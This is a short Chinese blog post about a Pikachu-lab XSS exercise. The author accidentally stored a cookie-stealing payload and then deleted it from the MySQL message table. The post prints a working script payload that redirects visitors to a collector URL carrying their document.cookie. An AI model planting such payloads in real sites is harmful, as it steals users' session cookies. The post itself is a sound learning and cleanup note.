存储型XSS清除方法

25 篇文章 0 订阅
14 篇文章 0 订阅
本文讲述了作者在进行XSS实验时误将payload输入到存储型XSS中,导致每次访问页面都会触发跳转。存储型XSS的危害在于它将恶意代码永久保存在数据库中,影响所有访问者。为解决问题,作者进入数据库删除了payload。文章强调了存储型XSS的严重性,并提供了清除方法。
摘要由CSDN通过智能技术生成

今天也是被自己气哭的一天

今天做XSS盗取cookie实验

<script>document.location='http://192.168.241.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

就是用这个罪恶的payload

我眼花之下把他输入了存储型的XSS里:(

导致我一进去存储型就给我跳转到首页

刚开始我以为被攻击了,查看源代码发现居然插入了我的payload

解决办法:

打开mysql数据库

use pikachu

show tables

select * from message 会看到你插入的payload

delete from message where id=87 删掉他

这就好了

存储型XSS会把键入的信息永久保存在数据库里

可见这种存储型的xss的危害是非常大的,因为它被存储到了后台数据库,每一个打开这个页面的用户都会因此而“中招”,这造成的是一种持久性的危害。

评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值